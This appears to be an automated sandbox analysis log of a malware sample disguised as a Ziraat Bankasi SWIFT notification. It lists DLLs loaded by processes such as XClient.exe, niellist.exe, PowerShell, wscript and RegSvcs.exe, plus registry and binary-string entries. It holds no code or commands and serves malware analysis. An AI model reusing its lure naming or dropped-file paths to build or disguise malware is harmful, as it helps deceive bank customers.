Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtctm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcprx.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtclog.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: xolehlp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: comres.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcvsp1res.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxoci.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: oci.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: hid.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: ntmarta.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static file information: File size 2007552 > 1048576

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253422637.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
